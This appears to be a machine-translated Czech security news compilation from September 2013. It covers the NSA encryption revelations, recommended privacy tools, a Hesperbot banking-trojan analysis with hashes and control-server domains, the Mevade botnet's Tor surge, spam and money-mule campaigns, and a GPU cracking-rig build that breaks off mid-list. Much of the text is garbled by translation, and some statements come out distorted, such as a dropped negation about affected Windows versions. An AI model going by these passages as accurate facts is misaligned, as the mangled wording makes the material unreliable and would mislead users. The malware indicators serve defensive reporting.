Podobné prohlášení jako to páteční ale odhaluje jinou stránku věci, a nejen o Googlu. V roce 2013 chce zapnout šifrování interně přesouvaných dat. Není na to poněkud pozdě? Znamená to tedy, že doposud naše data po celém světě provozoval otevřeně? Že je posílal rovnou do čínských zálohovacích center pro naši větší jistotu a pocit zajištění? Stejně tak je hezké proklamovat, jak hodlá s NSA bojovat šifrováním, když jindy prohlásil, že nebude sdílet šifrovací klíče uživatelů, ale pochopitelně je nuce je kdykoli vydat komukoli, kdo má náležitou právní moc. A dnes již dobře víme, že „ten zákon“ je pro požadavky amerických agentur velmi blahosklonný.
To vše dělá z pátečního prohlášení marketingovou hru, kterou nelze brát vážně. O bezpečnost dat různých provozovatelů cloudu očividně postaráno nebylo, data nebyla dostatečně šifrována, různé osoby na výplatní listině NSA měly příležitost instalovat různé utajené přístupy přímo do klíčových serverů a nakonec, dokud bude muset každá americká společnost panáčkovat, jakmile ji jedna ze šestnácti amerických agentur poručí, nic se na tom principiálního nezmění.
Vítejte nazpět v Evropě, data…
NSA není všemocná, data lze před ní stále uchránit
Nejnovější zprávy naznačují, že NSA je schopná zlomit většinu bezpečnostní protokolů, které jsou dnes používány. Zde je malý přehled nástrojů, které minimalizují rizika průniku agentů nebo jiných nezvaných zájemců k zabezpečeným údajům.
KyberSecurity
Ve čtvrtek světem otřásla další bomba, kterou odpálil Edward Snowden. NSA dokáže proniknout řadou bezpečnostních technologií pomocí kombinace různých zadních vrátek vložených do programů v okamžiku jejich vzniku, rozpočtu 250 milionů dolarů určeného k „motivaci“ výrobců k oslabování odolnosti jejich komerčních řešení a síly svého vybavení a personálu.
Do jisté míry to není překvapující. Ostatně, jiné země disponují podobnými možnostmi. K tomu se přidává fakt, že 90 procent uživatelů bezpečnostní zajištění svých dat vůbec nebere vážně. Vše ale není ještě ztraceno. Dosavadní šokující články neukázaly na konkrétní společnosti ani technologie, kterým již nelze důvěřovat, ale riziko lze do jisté míry minimalizovat.
Dnes již můžeme se slušnou mírou jistotu tvrdit, že korporace, nebo přinejmenším někteří jejich zaměstnanci, spolupracují s NSA a umisťují do zabezpečovacích technologií utajené vzdálené přístupy. Ti, kterým na jejich datech velmi záleží, budou ke komerčním šifrovacím technologiím (jako je například Microsoft BitLocker) více než rezervovaní.
Možnou cestou je používat nástroje, které jsou postaveny na otevřeném zdrojovém kódu a využívají veřejně publikovaných šifrovacích metod. Přinejmenším potřebují být kompatibilní s nejrůznějšími platformami a lze v nich pátrat po potenciálních bezpečnostních slabinách.
Zde je příklad několika takových nástrojů:
Truecrypt je vhodný pro zabezpečení citlivých souborů, složek nebo celých disků.
GPG je otevřená implementace protokolu OpenPGP, kterým lze šifrovat e-mailovou komunikaci.
TAILS (The Ammensic Incognito Live System) je linuxová distribuce cílená na zabezpečení a anonymitu. Je to balík mnoha řešení včetně klientů sítě TOR.
OTR, čili Off-The-Record messaging, je to kryptografický protokol pro šifrování a ověřování rychlých zpráv. Je postaven na standardech AES a SHA-1. Je mimo jiné součástí balíku TAILS.
Zabezpečení dat samozřejmě také závisí na bezpečném a zodpovědném chování, ale je třeba si uvědomit, že připojování přes HTTPS a VPN bylo primárním cílem NSA. Dnes se doporučuje používat především TLS a IPsec.
Experti: Šifrování je stále nejlepší ochrana proti NSA
Podle bezpečnostních odborníků je správně nasazené šifrování tvrdým oříškem i pro kryptografické odborníky amerických výzvědných služeb.
Šifrování | Zabezpečení
I když agentura NSA investuje miliardy dolarů do výzkumu prolomení šifrovacích technologií, bezpečnostní odborníci se domnívají, že správně implementované šifrování je stále tím nejlepším způsobem ochrany soukromí online.
Různé americké a britské zpravodajské zdroje tento týden publikovaly příspěvky podložené interními dokumenty NSA o technikách, které tato výzvědná agentura používá k dešifrování dat přenášených veřejnými komunikačními a datovými sítěmi. Z dokumentů poskytnutých Edwardem Snowdenem vyplývá, že NSA používá nejrůznější zákonné i nezákonné způsoby včetně instalování zadních vrátek, soudních příkazů nebo dokonce obchodních vztahů s provozovateli sítí a výrobci softwaru. Mnoho šifrovacích algoritmů, které se v současné době nejvíce používají k ochraně online komunikace, bankovních a zdravotních záznamů nebo obchodních tajemství, již dokáže prolomit nejen americká NSA, ale i britská GCHQ.
Steve Weis, technický ředitel společnosti PrivateCore, který získal doktorát z kryptografie na americké MIT, se však přesto domnívá, že matematické šifrovací algoritmy je stále velmi náročné prolomit. Podle jeho názoru se špionům podařilo prolomit zastaralé verze šifrovacích technologií se známými bezpečnostními slabinami.
Podle dokumentů například NSA zabudovala zadní vrátka do šifrovacího standardu Dual EC DRBG, který slouží ke generování náhodných čísel. Podle Weise vznikl tento algoritmus před šesti lety a od chvíle, kdy dva odborníci Microsoftu ona zadní vrátka odhalili, se používá jen zřídka.
Podle Weise není jasné, jestli šifrovací odborníci zpravodajských služeb pronikli do robustnějších šifrovacích algoritmů. „Zatím jsem neviděl nic, co by napovídalo, že by byly prolomeny algoritmy jako AES,“ dodal Weis na vysvětlenou.
„Pokud je šifrování nasazeno správným způsobem, nabízí v podstatě neproniknutelné zabezpečení,“ domnívá se Dave Anderson, ředitel společnosti Voltage Security, poskytovatele šifrovacích technologií. „Prolomení takového zabezpečení by nejvýkonnějším superpočítačům zabralo miliony let. Pokud je ale nasazeno nedbale, bez náležité správy šifrovacích klíčů, dokáže do něj proniknout průměrný hacker s běžně dostupným osobním počítačem během několika hodin,“ vysvětlil Anderson.
Podle Andersona se NSA daří pronikat spíše do správy klíčů než přímo do šifrovacích algoritmů. Pokud je tedy NSA schopna dešifrovat tajné soukromé nebo firemní údaje, nemůžou za to slabé šifrovací technologie, ale nedostatky ve správě šifrovacích klíčů.
Podobný názor sdílí i Dave Jevans, zakladatel a technický ředitel společnosti Marble Security, která nabízí mobilní šifrování. Podle Jevanse využívá NSA ohromné finanční prostředky i tisíce zaměstnanců právě na nejslabší články řetězu, tedy lidský faktor a správu šifrovacích klíčů. „Je to miliardkrát účinnější přístup,“ poznamenal Jevans.
Weis proto na základě známých informací doporučuje používat otevřené standardy jako Open SSL, jejichž kód je všem veřejně přístupný a je do něj proto mnohem obtížnější ukrýt zadní vrátka. Což se – ve světle nejnovějších informací – o různých proprietárních řešeních říct nedá.
Hesperus (Evening Star) září jako posledního "Banker" Trojan
6.9.2013 Kriminalita | Viry
Hesperus nebo Hesperbot, je nově objevená bankéř malware, který krade informace o uživateli, zejména on-line bankovnictví pověření. Ve funkci je podobná jako u jiných "bankéřů" v přírodě, zejména Zbot. Hesperus znamená Večernice v řečtině. Je velmi aktivní v Turecku a České republice a pomalu se šíří po celém světě. Tento sofistikovaný malware používá z různých modulů pro zvláštní účely, vstřikuje HTML skripty na bankovní související webové stránky, ukládá všechny moduly a data v šifrované podobě, šifruje svůj konfigurační soubor, používá šifrovací algoritmus Twofish s HMAC-SHA512 křížkem, zaměstnává WinScard. dll číst čipové karty, a komunikuje s jeho ovládání serveru přes SSL. To také používá současnou standardní technikou vstřikování celý svůj kód do Attrib.exe a pak do explorer.exe. Proto její komunikace se zdají být z legálního souboru explorer.exe. Analyzovala jsem nedávno binární kompilované 2. září, a shledal, že jeho řídicí server, je velmi aktivní. Hlavní aplikace na zakázku balení. Po rozbalení obsahuje řetězec naznačující dropper_x86.bin je jeho původní jméno: MD5: 72AD2AF02C98068DE5FD9F9AE2C5B750. Zpracoval Datum: Pondělí 02.9.2013, 11:18:20 Dropper_x86.bin obsahuje dva binární soubory specifické pro operační systém: Core_x86.bin pro 32-bit OS. MD5: 524C3F6F5D6968557AB000B920D42D9E. Zpracoval Datum: Pondělí 02.9.2013, 10:46:05 Core_x64.bin pro 64-bit OS. MD5: 5D7E115CD6269FDDFB75AE76E5D5221A. Zpracoval Datum: pondělí 2.09.2013, 10:46:16 - 64 Bit EXE Tyto binární soubory mají jednu funkci exportu, "_hesperus_core_entry", tedy bot jméno. Následující řetězce navrhnout možné zeměpisné umístění na infekce: botnet Hlavní binární vybalení kód: dešifrování Tento kód se spustí Attrib.exe v zavěšeném stavu a vstřikuje jeho kód. Padne několik souborů do adresáře% APPDATA%. Jako DAT a souborů. BKP. Informace o uživateli, jako je název počítače / uživatelské jméno, šifrovací klíč, hlavní binární soubor, stažených škodlivých modulů a konfiguračního souboru jsou uloženy v jiném. DAT. K. BKP soubory jsou záložní soubory. Souborů dat. dir Data v. DAT a. Soubory BKP je šifrována pomocí šifrovacího algoritmu Twofish s HMAC-SHA512 křížkem. HMAC Po aplikaci injekce kódu do explorer.exe, malware se připojí k jeho ovládání serveru pomocí protokolu HTTPS se vyhnout obecné Antimalwarový detekci. Její komunikace zdánlivě přijde z legitimních systémového souboru explorer.exe. Kromě toho, že názvy domén kontrolních serverů se zdají být oprávněné domény WHOIS služby požádá. Používání validního SSL provoz je malware ještě těžší odhalit. Použití SSL, Trojan stáhne další škodlivé moduly z jeho ovládání serveru. Ty se používají pro skrytí Virtual Network Computing, a keylogging, obrazovky rekordér, čtečka karet Smart Card, zásuvka bezpečný protokol proxy server, atd. Tyto moduly jsou: hvnc_mod_x86.mod keylog_mod_x86.mod sch_mod_x86.mod socks_mod_x86.mod Malware komunikuje s ostatními důvěryhodných webech, jako je google.com, facebook.com, wikipedia.org, atd. síť Přidružené domény Control Server: Whoischeck.biz spolehlivé, dns.co.uk 91.213.233.197 Další varianta ke stažení další malware z jiné adresy a shromažďuje a odesílá adresy uživatelů e-mailu na ptcliente.org / GR-mail / tr-mail.php. MD5: A79D1E01A05C262DC0A8DA5C577CAF89. Zpracoval Datum: čtvrtek 29 srpen 2013, 09:01:08 tr Další varianta (MD5:. 4107E4C91B197C483C320DA13EF27F95 Zpracoval Datum: pondělí 2.09.2013, 11:12:21) posílá infekce informací pomocí POST na identity-check.org/nlog/nlog.php.
Microsoft uvolní 14 bulletiny opravou Office, Windows, IE a NET.
7.9.2013 Zranitelnosti
Zářijový vydání patche oznámení Microsoftu předem úterý se objevila v celé své kráse. Statný 14 bulletinů jsou na obzoru, rozdělen rovným dílem mezi rodinou MS Office a Windows OS záplaty, se špetkou Internet Explorer (IE) a. NET házet do pro chuť. Existuje pět návěstí označeny jako kritické, nejvyšší hodnocení Microsoftu. Všechny z nich se bude důležité, subjektivní nasazení různých verzí systému Windows ve vašem prostředí. Jeden z nich bude měsíční IE aktualizace, což je vždy důležité pro ty, kteří dosud přešel k lepšímu prohlížeči. Všechny verze IE vyžadují tuto aktualizaci. Z dalších čtyřech důležitých bulletinů, až na jednoho, IE bulletiny čtyři a pět vyskočit jako zejména co se týče, zejména čtyři, která se vztahuje pouze na XP a 2003. Je zajímavé, že pět bulletin se vztahuje na Windows Vista a 2008, ale Windows 7 nebo novější. Každá z nich by mohla být wormable problém, i když pravděpodobně nebude ve výchozí konfiguraci. Pokud používáte Microsoft těžký obchod a významně investovaly do technologií back office SharePoint a všechny jeho slavné služeb, pak tento měsíc bude velmi práce pro vás. Existuje spousta záplat nasadit, z nichž mnohé jsou vysoce rizikové. Kancelářské chyby jsou obvykle zmírňuje tím, že vyžadují, aby uživatel komunikovat s něčím škodlivým, a to buď prostřednictvím připojení, nebo odkaz, aby mohly být využity. Ale s Office SharePoint Server (), která Stupeň zmírnění může odejít a dalších faktorů obrany v hloubce přijde do hry. Autor: Ross Barrett, Senior Manager, Bezpečnostní technika, Rapid7
Masivní hrot Tor uživatelů způsobené Mevade botnetu
7.9.2013 BotNet | Zabezpečení
Při projektu Tor režisér Roger Dingledine nedávno obrátila pozornost veřejnosti k neobvyklé a značné zvýšení počtu Tor uživatelů, pozval lidi, aby spekulovat a sdílet věrohodné vysvětlení o tom, protože jeho vlastním přístupem, ale nebyli jsme schopni najít to tím, samy o sobě.
Tyto teorie předložené v rozmezí od publicity Browser Pirate pryč přes palubu a Ruska nedávné úsilí o cenzuře internetu, k reakci na dozoru NSA úsilí. Ve čtvrtek Dingledine ozval se znovu říci, že vzestupný trend pokračoval, a že sází své peníze Důvodem je to, že botnet. "Faktem je, že se růstové křivky, jako je tento, je to v podstatě žádný způsob, že je tu nový člověk za každé z těchto Tor klienty," řekl napsal . "Tito klienti Tor dostal svázané do nějakého nového softwaru, který dostal nainstalován na milionech počítačů skoro přes noc. Protože žádná velká software nebo operační systém prodejci přišli dopředu, aby nám řekli, že jen svázaný Tor se všemi jejich uživateli, že mě nechává s jedním uzavřením : tam někdo napaden miliony počítačů a jako součást jejich plánu se instalují Tor klienty na nich. " Teorie, které více než pravděpodobné obecnou pasivitou z těchto nových uživatelů, bylo potvrzeno holandský-založil firmu bezpečnostního auditu Fox-IT. "V posledních dnech jsme skutečně našel důkazy, které naznačují, že konkrétní a poměrně neznámý botnet je zodpovědný za většinu náhlé uptick v Tor uživatelů," napsal bezpečnostní specialista Yonathan Klijnsma. "Nedávné odhalení jméno, které má byl použit ve vztahu k tomuto botnetu je "Mevade.A", ale starší odkazy naznačují názvem "Sefnit", která sahá až přinejmenším do roku 2009, a také Tor připojení. Zjistili jsme, různé odkazy, že malware je interně známý jako SBC jeho provozovatele. " Takže botnet je masivní, a nic nového. Před přidáním Tor jako způsob komunikace, roboty používá HTTP a alternativní metody pro komunikaci s jejich C & C kanálu. "Jak bylo zdůrazněno v Tor týdenní zprávy, musí být verze Tor, který používá nové Tor klienti 0.2.3 . x, vzhledem k tomu, že nemají používat novou metodu. Tor handshake základě kódu, můžeme potvrdit, že verze Tor, který se používá, je 0.2.3.25, "sdílel. Fox-IT vědci nejsou zcela jisti, co je malware dělá, ale věří, že to pochází z oblasti, kde se mluví rusky, tak spekulují, že jeho pravděpodobně motivován přímou nebo nepřímou finanční trestný čin. "Zpětná vazba od Smart Protection Network ukazuje, že malware byl Mevade, opravdu, stahování Tor modul v posledních týdnech srpna a začátkem září, "odborníci Trend Micro přidal své dva centy na rozhovor. Také dodal, že provozovatelé botnetu byly sledovány až do Charkov, Ukrajiny a Izraele, ale v současné době znám pouze jejich on-line rukojeti. Mají zřejmě působí od roku 2010, a zdá se být součástí "dobře organizované a pravděpodobně dobře financované počítačové trestné činnosti gangu." Říkají, že mají podezření, botnet je vydělávat instalací adware a panely nástrojů do ohroženého systému. "To nevypadá jako nové klienty používáte Tor sítě na zasílání provoz na externí cíle (např. webové stránky). Zatím lze usuzovat, že" znovu přístup skryté služby - rychlé relé viz "Přijaté ESTABLISH_RENDEZVOUS vyžádání" mnohokrát za sekundu v jejich informací na úrovni protokolů, ale rychlý odchod relé nevykazují výrazný nárůst výstupního provozu, "poznamenal Dingledine. "Jeden přijatelné vysvětlení (za předpokladu, že je skutečně botnet), je to, že je to běh jeho velení a řízení (C & C), bod jako skrytý." Ještě je tu jedna věc, která zahřeje srdce, a to je, že Tor je síť stále pracovní navzdory masovým nárůstem Tor klientů na něj a nových obvodů Dělají. "Myslím, že všechno, co práce jsme dělali na škálovatelnost je to dobrý nápad," dodal. Přesto jsou hodně relé se maximu na CPU zatížení, a mohly by být brzy přemožen, takže sdílí seznam pravděpodobné akce pro projekt, aby se, aby se zabránilo tomu, že z děje nyní i do budoucna.
NSA snaha rozvrátit šifrování, nainstalovat zadní vrátka
7.9.2013 Kryptografie | Zabezpečení
Novináři z New York Times a ProPublica spojily síly a vydaly nejvíce výbušný předmět, k dnešnímu dni se zabývá odhalení o úsilí NSA špionáž. Podporována dokumentů sdílených informátorů NSA Edward Snowdena uvádějí, že americká Národní bezpečnostní agentura má aktivně a po celá léta nyní soustředí na zamezení nebo rozvracení šifrování úsilí prostřednictvím několika způsoby, a že jejich snahy byly velmi úspěšné. "agentura obcházena nebo popraskané hodně šifrování nebo digitální kódování, která chrání globální obchod a bankovní systémy, chrání citlivá data jako obchodní tajemství a lékařských záznamů, a automaticky zabezpečuje nastavení e-mailů, vyhledávání na webu, internetové chaty a telefonátů Američanů a dalších po celém světě, dokumenty ukazují, "tvrdí. Mnoho uživatelů se předpokládá "- nebo byly zajištěny Internetu společnosti -., že jejich data jsou v bezpečí před zvědavýma očima, včetně vlády a Národní bezpečnostní úřad chce, aby to tak agentura léčí své nedávné úspěchy v dešifrování chráněných informací jako mezi jeho nejvíce střežených tajemství, omezeny na ty, schváleny pro přísně tajné programu s kódovým označením Bullrun. " Poukázali na to, že po NSA ztratil velmi veřejný spor v roce 1994 o tom, zda by mělo být umožněno, aby se vešly na zadní vrátka do všech šifrování, se rozhodli, že se nebude zmařena tím útlum a rozhodli se jednoduše pokračovali v úsilí - tentokrát v tajnosti. Nemuseli se soustředit na prolomení šifrování stejně jako dělat jeho použití irelevantní. Udělali začít používat rychlejší a rychlejší superpočítače pro lámání kryptografické klíče, ale také, mimo jiné:
Zabezpečil spolupráce - buď dobrovolná nebo právně nucen - z USA a zahraniční internetu a telekomunikačních společností k získání potřebných přístup ke komunikaci, jež chtěli zkontrolovat před tím, než byly zašifrovány. Jinak, když ani jeden z těchto dvou přístupů pracoval, by ukrást šifrovací firem tlačítek nebo tajně změnit své výrobky obsahují backdoor známa pouze NSA. Naboural do počítače / koncové body před zprávy jsou zašifrovány. Ovlivnil Americký národní institut pro standardy a technologie (NIST) a Mezinárodní organizace pro normalizaci, aby přijaly šifrovací standard, který byl dosažený NSA patří slabost znají jen oni. Všechny tyto věci byly, samozřejmě, udělat v tajnosti. "Plný rozsah funkcí dekódování NSA je známa pouze omezenému okruhu špičkových analytiků z tzv. pěti Oči: NSA a jeho protějšky v Británii, Kanadě, Austrálii a na Novém Zélandu,". Reportéři sdílených Existuje mnoho více informací o těchto a dalších snah na původní článek , a ten publikoval The Guardian , a já vás vyzývám, abyste prostudovat je. Budete pravděpodobně šokováni, co jste si mysleli, že je v bezpečí (např. SSL, VPN, nebo $ G), ale ve skutečnosti není. Matthew Green, cryptographer a výzkum profesor na Johns Hopkins University, má zajímavý blog post s spekulací o tom, které číslo bylo hardwaru a standardy oslabený, a které se podíleli. Naopak, Bruce Schneier, další známá cryptographer a počítačové bezpečnostní expert, jakož i soukromí obhájce, pracuje se na Guardian příběhů NSA a má požadovaný vhled do detailů nabídnout sadu rad , které mohou pomoci každý z nás udržet se on-line komunikaci a akce bezpečné -. nebo tak bezpečný, jak oni mohou být "NSA změnil strukturu internetu v obrovský dohled platformu, ale nejsou kouzelné. Jsou omezeny stejným ekonomické realitě jako zbytek z nás a naší nejlepší obranou je, aby se dohled nad nás tak drahé, jak je to možné, "podotkl. "Věř matematiku. Šifrování je váš přítel. Používejte ji dobře, a dělat to nejlepší, aby zajistily, že nic nemůže ohrozit to. To je, jak můžete zůstat zajištěna i tváří v tvář NSA." Je zajímavé si povšimnout, že jak NYT a ProPublica byli požádáni o zpravodajských služeb USA nezveřejnit tento poslední článek, že "by to mohlo podnítit zahraniční cíle přejít na nové formy šifrování nebo sdělení, které by bylo těžší vybírat nebo číst." Nicméně, obě publikace odmítl. " Příběh, věříme, že je důležitá. Ukazuje se, že očekávání milionů uživatelů internetu týkající se soukromí svých elektronických komunikací se mýlí, "ProPublica editor-in-šéf a jeho ředitel zdůraznil . "Tato očekávání vedou praktiky soukromých osob a firem, většina z nich nevinný nějakého darebáctví. potenciál pro zneužívání těchto mimořádných schopností v oblasti dohledu, včetně k politickým účelům, je značný. vláda trvá na tom, že zavedla brzd a protivah omezit nevhodnému použití této technologie . Avšak otázka, zda jsou efektivní, je zdaleka vyřešeny a je otázkou, která může být projednána lidí a jejich volenými zástupci, pokud základní fakta jsou odhaleny. "
NSA oznámila nové školy pro počítačové iniciativy
7.9.2013 Špionáž | Zabezpečení
Čtyři nové školy byly vybrány Národní bezpečnostní agentury Národních center akademické excelence v oblasti Operations Cyber program, který byl navržen tak, aby pěstovat více amerických počítačovými odborníky. Po pečlivé aplikace a prověření, NSA vybrány následující školy přijímat CAE-Cyber Operace označení pro akademický rok 2013-2014:
Air Force Institute of Technology v Ohiu Auburn University, Alabama Carnegie Mellon University, Pennsylvania Mississippi State University. Program, který má nyní celkem osm škol, doplňuje více než 100 existujících center akademické excelence (CAES) v oblasti výzkumu a informace o zajištění vzdělávání -. Společně pod dohledem NSA a Department of Homeland Security následek prezidenta Národní iniciativy pro Cybersecurity vzdělávání, program určuje instituce, které mají hluboce technický interdisciplinární vzdělávací program zaměřený na oblasti, jako jsou počítačové vědy a elektrotechniky. Agentura dlouhodobě spolupracuje se školami zlepšit vzdělávání v oblasti vědy, technologie, inženýrství a matematiky. Kromě toho program nabízí někteří účastníci možnost uplatnit své učení nebo zlepšit svou výuku v letních seminářů na NSA. Účastnící se studenty a členy fakulty nejsou zapojeni do skutečných veřejných aktivit amerických zpravodajských. Steven LaFountain, NSA technický vedoucí, řekl, právní a etické otázky v kybernetické bezpečnosti jsou potřeby a důležitou součástí úsilí. "V procesu žádosti a ve všech jejích pracovat s vybranými školami, NSA zdůrazňuje důležitost integrity a dodržování předpisů, "řekl. "Cyber dovednosti jsou stále důležitější v národní obrany, ale to je ještě důležitější, aby pracoval jako zodpovědných občanů v používání těchto dovedností." Témata jsou běžně učí na vysokých školách a univerzitách, ale tato iniciativa integruje materiál, který pomůže studentům lépe pochopit jak by mohly někdy pomáhají bránit národ. Účastníci Letní seminář musí projít prověrek a získat dočasné, přísně tajné bezpečnostní prověrky. Školy vybrané v roce 2012, na programu první rok, bylo Dakota State University, South Dakota, Námořní postgraduální školy, Kalifornie, Severovýchodní univerzita, Massachusetts, a University of Tulsa, Oklahoma. Stejně jako ostatní agentury CAES jsou ty v provozní kybernetické programu každoročně hodnocen. Označení jsou na dobu pěti let a školy po celé zemi mohou soutěžit se připojit každý rok. důchodci Lt Gen Ronald L. Burgess Jr., bývalý ředitel americké zpravodajské agentury obrany, nyní slouží jako Senior Counsel Auburn University v národních bezpečnostních programů , Cyber programy a vojenských záležitostech. CAE-Cyber Operations projekt má skutečně opodstatnění, řekl. "Auburn věnuje značné prostředky a interdisciplinární přísně na celém areálu rozšíření nových kybernetických iniciativy a rozsáhlé spolupráci s externími organizacemi," řekl. "Jsme velmi rádi, že NSA uznal naše úsilí výběrem Auburn University" pro program. "Je důležité, aby národ - a chceme být součástí strategického postup a cítit se můžeme přispět k této národní potřeby."
Falešné e-maily, tvrdí CNN USA začaly bombardovat Sýrii
6.9.2013 Spam
Jsme v současné době svědky spam běh, který zahrnuje (fake) zprávu CNN říká, že USA začaly bombardovat Sýrii.
Kliknutím na zkrácený odkaz povede k exploit kit který se zaměřuje na starší, zranitelné verze Adobe Reader a Java. Útočníci favorizují použití exploit Java přes Reader zneužití, jako Java exploity jsou obecně spolehlivější.
Využít stáhne Trojan-Downloader do systému, který bude následně stahovat různé další malware.
Viděli jsme tito aktéři používají různé metody, jak dostat lidi, aby klikali na odkazy v e-mailech, včetně falešné Facebook a PayPal e-maily. Oni také mají tendenci používat různé služby, zkrácení URL adres.
To není překvapující, počítačoví zločinci skok na aktualitami. Pokud USA se rozhodnete ve prospěch vojenské akce proti Sýrii můžeme očekávat mnohem více Sýrie-themed nebezpečné e-maily.
Mule Flood v Japonsku
6.9.2013 Spam | Hacking
Peníze emaily mezek náboru nejsou ničím novým, po celá léta byly tyto nevyžádanou poštou se po celém světě. Co je nového, i když je nedávná vlna zaměřená na "anglicky mluvících japonských obyvatel." Začalo to na konci července a my jsme obdrželi stovky těchto tématických nevyžádaných e-mailů od té doby.
Obsah obvykle slibuje snadnou práci, vyžadující jen několik hodin týdně s velmi málo dalších požadavků.
Pravděpodobně to spam vlna nebyla příliš úspěšná. Jedním z možných vysvětlení spočívá v tom, že mnoho japonských lidí, které znám jednoduše Koš anglické e-maily, pokud nejsou běžně pracují s nimi. Také, jako v našem případě, že většina z těchto e-mailů filtruje a umístí do koše do bezpečnostního softwaru již. Dalším důvodem může být to, že Japonci, kteří skutečně mluví anglicky jsou dost chytří na to cítit něco phishy zde.
A když už mluvíme o phishy ... vlastně phishing a peníze muly spolu úzce souvisejí. V phishingu ukrást přihlašovací údaje pro online bankovnictví účty a je to. Získané informace se pak prodává na další tým zločinců, personalisty peníze mezek. Jejich úkolem je "hotovost" ukradené účty.
Co se stalo na konci srpna byla první _ever_ (?) Vzhled e-mailů peněz mule náboru v japonském jazyce. V e-mailu, osoba jménem "Martin" vysvětluje stručně o této nové pracovní místo se odměn ~ 600,000 jenů. Všechny e-maily tohoto druhu přišel z adresy jako "Blah.Blah @ outlook.com".
Vzali jsme příležitost odpovědět na některé z nich ("Prosím, řekni mi víc ..."), aby bylo možné pozorovat, co se bude dít.
Netrvalo příliš dlouho, než jsme se dostali odpovědi - e-mail od "Martin", jak dobře, ale z úplně jiného e-mailovou adresu a "poradenské" firmy údajně se sídlem ve Švédsku. Ze záhlaví e-mailu jsme dospěli k závěru, že dva servery používané pro odesílání e-mailů se nachází v Rusku. Jednou z oblastí je zaregistrován (co vypadá jako) osoby v Itálii, druhá v USA.
Nyní byl obsah i dvojjazyčné a připojené údaje obsahovala "Contrakt" (sic) a některé další doklady, které vysvětlují, jak je tato Celý projekt by měl fungovat. Dále jsme vytvořili nějaké nesmyslné otázky odpověď, která vedla k určité e-mailové ping-pong, což nám umožňuje shromáždit více informací o odesílateli (y). Tento "zaměstnavatel" radil nám vytvořit nový bankovní účet ("Předvolby: Resonabank, Sevenbank, Shinseibank ...") a zahrnuje další přílohu k vyplnění náš bankovní informace.
A to je vše, co jsme mohli jít, protože dalším krokem by bylo přijímat (ukradené) peníze na tento účet s konečným účelem předání asi 90% přijatého peněz prostřednictvím bankovního převodu a udržování zbývající částku jako náš poplatek.
Můžeme jen doporučit všem ignorovat přístupy tohoto druhu; že peníze mezek není žádná legrace, ale je to velmi závažný trestný čin a rychle vstupenek na policejní stanici.
Chtěli byste najmout spammer?
6.9.2013 Spam | Kriminalita
I prohlédnout přes mé složky Nevyžádaná pošta pravidelně hledá něco neobvyklého. Já také zkoumat docela blízko email, který je samozřejmě spam, který dělat to přes do pošty. Ten ve skutečnosti hodně čte jako žádosti o zaměstnání, nebo podporu podnikání pokus pokazilo. Na rozdíl od žádosti o zaměstnání nebylo určeno pro každého, zejména, a byl ve skutečnosti zaslána SANS Internet Storm Center Handling distribučního seznamu. Skutečnost, že manipulátory jsou na seznamu nevyžádané pošty předpokládám, není překvapující. Připadá mi zvláštní, že tento člověk, který hledá práci, koupil seznamu za účelem spamování It! Neměl přiložit životopis (na rozdíl od spammerů Bernard Shifman), ale udělal místo odkaz na jeho profil LinkedIn, aby příjemci jeho spam můžete přečíst vše o svém, kteří dosáhli získal titul MBA. Což mě zajímalo, jestli se učí spamový na vysoké škole nebo vysoké škole v těchto dnech? Mé myšlenky na toto téma je, že spam není způsob, jak jít, když na trh sami nebo Vaše podnikání. Také já jsem docela jistý, SANS by najmout spammer jako "obchodní analytik". Manipulátory seznam nebyl nikdy použit k propagaci žádné pracovní příležitosti. Který má opravdu mě zajímalo, kde to mám? I tam, kde by dostal myšlenku, že spam náhodné lidé na internetu by to pomohlo jeho hledání práce? Zde je první část korespondence:
On je nesmlouvavé a odpoví, že on je kreativní! Zajímalo by mě, jestli se učí etiku v podnikání v místě, kde získal titul MBA? Co si myslíte? Creative nebo spammer? Chcete pronájem nebo podnikání s spammer? Ten se zdá být v dobré společnosti, se spam stal novým obnovení distribuce metodou volby:? http://blog.dynamoo.com/2013/06/is-this-guy-moron-spammer.html
Připadá mi to depresivní, že spammer se zdá, že ve skutečnosti dostala práci zhruba čtyři týdny později. No, podle svého profilu LinkedIn, tak to musí být pravda! doporučuje přečíst o tom, jak vlastně najít práci bez rozesílání spamu: http://careers.theguardian.com/careers-blog/why-you-need-to- stop-spam-zaměstnavatelé Co je to "Bernard
Vytváření vlastní GPU Povoleno Private Cloud
6.9.2013 Software
S jedním "mimoškolní" Projekt likvidace, Myslel jsem, že je čas začít další, a hrát s novou plodinu GPU pro hash a prolomení hesla se jeví jako zábavný způsob, jak jít.
Na první pohled by se používat specializovaný hardware, jako GPU znamená, že byste pracovat na fyzickém počítači, který používáte VM není v kartách. Není to tak, je to vlastně docela snadné, aby se létat v VM, s trochou plánování. Pro mě to také znamená, že nemám potřebu najít místo pro nový server.
Za prvé, budete potřebovat krátký seznam ", musí začlenit":
hypervisor, který podporuje VT-d - já používám VMware ESXi (to není něco, co si chcete vyzkoušet v Workstation) Základní deska a procesor, který podporuje VT-d. Já používám desky Tyan a Xeon E3. Ujistěte se, že vaše základní deska bude podporovat PCIe x16 karty. Nemusíte x16 propustnost, i x2 slot bude dělat dobře, ale musí být schopen přijmout x16 (moje deska má x8) Pokud máte v úmyslu použít více než jeden GPU kartu, ujistěte se, že základní deska má dostatek slotů, a že jsou dost daleko od sebe (GPU obecně se 2 sloty). Také s více kartami, bude konfigurace tower sklon k přehřátí vrchní kartu (y) - zkontrolujte, zda máte spoustu fanoušků v případě, a pokusit se skončit s kartami namontován svisle po tom všem je řekl a udělal. Ujistěte se, že máte napájení se spoustou konektorů a napájení - karta jsem skončil kupování potřeboval jak je 8 pin a 6 pin PCIe napájecí konektor. Mám 650Watt modulární napájení hrát si s tímto strojem, takže je vše v pořádku. Konečně, právo GPU. Pro lidi, jako jsem já, které jsou na rozpočet, existují dvě hlavní možnosti v GPU - NVIDIA a AMD.
